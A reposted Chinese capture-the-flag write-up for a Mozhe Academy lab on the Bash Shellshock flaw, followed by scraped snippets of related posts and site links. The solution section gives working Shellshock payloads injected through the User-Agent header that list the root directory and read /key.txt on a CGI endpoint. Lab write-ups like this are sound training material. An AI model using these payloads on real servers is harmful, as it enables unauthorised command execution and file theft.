[ 墨者学院 ] 命令执行——Bash漏洞分析溯源
0x00.题目描述:
背景介绍
安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。
实训目标
1、了解bash;
2、了解Bash远程命令执行漏洞形成原因;
3、了解Bash远程命令执行漏洞利用方法;
解题方向
找到poc.cgi文件
0x01.题目分析:
根据题目说明,在网上对Bash远程命令执行漏洞进行了一番学习。
参考连接
freebuf:https://www.freebuf.com/vuls/44994.html
Seebug:https://www.seebug.org/vuldb/ssvid-88877
0x02.解题过程
通过网上的资料搜查,发现此漏洞存在的路径多数在网页/cgi-bin/下,结合题目给的提示,打开http://url/cgi-bin/poc.cgi
构造执行语句插入到请求头的User-Agent头里面
User-Agent: () { :;}; echo; /bin/ls /
然后构造执行语句查看key.txt
User-Agent: () { :;}; echo; /bin/cat /key.txt
转载于:https://www.cnblogs.com/qtisec/p/11095444.html
[ 墨者学院 ] 命令执行——Bash漏洞分析溯源相关推荐
- 墨者靶场 初级:Bash漏洞分析溯源
墨者靶场 初级:Bash漏洞分析溯源 题目 背景介绍 实训目标 解题方向 解题步骤 题目 背景介绍 安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命 ...
- 墨者学院-登录密码重置漏洞分析溯源
墨者学院-登录密码重置漏洞分析溯源 此题我是这么做出来的,首先用我已知的手机号进行重置密码操作,然后再开一个网页,填上嫌疑人的手机号,并发送短信,然后也给已知的手机号发送验证码 再给嫌疑人的复制过去, ...
- 墨者学院-Bash漏洞分析溯源
Bash漏洞分析溯源 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器.wwwscan 1.打开靶场,根据题目思路找poc.cgi. 2.使用wwwscan扫一下 发现有目录/cgi ...
- 墨者学院_phpMyAdmin后台文件包含分析溯源
墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管 ...
- 墨者学院 - Bash漏洞分析溯源
bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulne ...
- Bash漏洞分析溯源 cgi文件 (CVE-2014-6271) --墨者学院
01 背景介绍 Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令,在一些cgi脚本中,数据是通过环境变量来传递的,这样就会形成该漏洞: bash通过以函数名作为环境变量名,以&qu ...
- 墨者 - Bash漏洞分析溯源
bash代码注入的安全漏洞分析 bash的环境变量 环境变量是操作系统运行shell中的变量,很多程序的运行需要获取系统的环境变量参数.具体赋值格式如下: $ var="hello worl ...
- Bash漏洞分析溯源
漏洞简介 Bash(GNU Bourne-Again Shell)是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令.Bash还能从文件中读取命令,这样的文件称为脚本. 1.bash漏 ...
- 墨者Bash漏洞分析溯源题解
这个漏洞是看别人的思路解出来的,因为在打开页面后,我扫描不出来其他东西,惭愧 后台存在一个地址,是http://219.153.49.228:49581/cgi-bin/poc.cgi 访问这个地址 ...
最新文章
- blender硬表面建模渲染终极教程
- 企业网络推广期间关于网站分享功能设计有哪些细节需要加以重视?
- 服务器定期巡检项目,服务器定期巡检制度..docx
- 【Linux开发】linux设备驱动归纳总结(十二):简单的数码相框
- 集群高并发情况下如何保证分布式唯一全局ID生成
- 英文书: Python 网络编程基础手册
- python---小技巧
- 实现 Excel 多列数据组合
- mysql workbench中PK,NN,UQ,BIN,UN,ZF,AI字段类型标识说明
- 计算机应用word单元测试2,(计算机应用基本技能测试二.doc
- 10的负8次方用python_matplotlib;10的分数次幂;科学记数法
- 显示器手调对比度算法介绍
- 强大的strace命令
- Windows 2008 R2 配置 DNS 实现二级域名
- Javascript代码用YC_jsRun()函数执行Javascript文件
- 苹果xr十大隐藏功能_别再说苹果“悬浮球”功能不好用,隐藏的实用小技巧,每天用得上...
- 【XAI】Nettack IG-JSMA
- 隐私信息检索(PIR)
- 项目:招聘网站信息(获取数据+数据分析+数据可视化)
- linux opengl es,在Linux上,如何开发OpenGL ES(GLES)2.0应用程序?
热门文章
- Python任务调度模块 – APScheduler,Flask-APScheduler实现定时任务
- BZOJ 2820 莫比乌斯反演
- 试用SpringBoot创建WEB应用
- memcache读书笔记(二)
- Oracle 共享磁盘阵列 双机热备 实战 配置教程 配置手册
- resin服务器配置错误
- 第19节 项目整体绩效评估.
- ACM 配置中心实战:Spring + MyBatis + Druid + ACM
- element-ui表格列金额显示两位小数
- [PHP] 编写爬虫获取淘宝网上所有的商品分类以及关键属性 销售属性 非关键属性数据...